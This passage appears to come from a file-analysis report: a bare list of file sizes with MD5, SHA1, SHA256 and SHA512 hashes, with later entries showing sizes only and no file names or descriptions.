SHA256ff2787534a0da486583ac6aabed1f30b9af3d0c7ac2390771c167a60f2dd266c
SHA512e96de2faa86c70361a9e15397e01b73e1126f6f97c195fa06d1ad491f874376f0a1b3a45518639e8eb594640048126bc73b924b8f2dce961dabf364dabad0155
-
Filesize
6B
MD59fc3796ee0d2bb42d79fe1b5ce106122
SHA1d15d023df3c9ee8d1306488308f20bb571e5b89c
SHA25641fdbb429f5f3a0c95ab831c845b5102a7d64762d6b4b8aebea8ff764183ddd4
SHA51234fee1699f6be54eb867bd8f208c9b003ec57754236caf8d355e5be508d3e2003606c2b29ca60760b97848fda499bb13ae8656901365bfad2dcacf367c009c21
-
Filesize
20B
MD557d6a48d6c9662ac864de0d1dd72b817
SHA121ed38c2db149a74c62471742ea86713cde6f964
SHA25627887f9d869d9ea998f4dc50879da686e824c73c39c7b65930da9df2111aa7fd
SHA5127e35f5665a6b3eaf626c51bd70d5eb9032c2e86be1a4e382575c72035cb0877fe05bc793c5510309b877e46c9c16191db39085f4eac7de2cbf4d15bab006d2f6
-
Filesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
Filesize
500B
MD55137876455f2fd0c032ceed6fdbe49cb
SHA1a33210e43247b1f04f51a341e5be79f769acc941
SHA2568689fd11c63754aeabb202d7e1db3e5fe896f4e4e3597d4bfed58950f3110bb9
SHA5123deef3848e340a0a631a8969ebabfde22a9a5c69a0c2ec2ad7e2e745800a593591f173c5611b573be7ea87261459d97680e85b13da73e39a8aabdfbfc7609761
-
Filesize
350B
MD5813a669022957d7daacc03486ee97656
SHA14421e5284b5dc101cc1e544c6563dde321ad434d
SHA256c4651feb8da306613ce32bef71c14d2aa52cd9317ad21a9d825a3677146d40fb
SHA5122527eb6ffada5388395c33d5284e50c9ee957744504c4def1c1f24145e9a4573be1978142b76c23cd6b1ce4dfdac3071d3d6a2bdc3c5476187f055687d051145
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
132KB
-
Filesize
132KB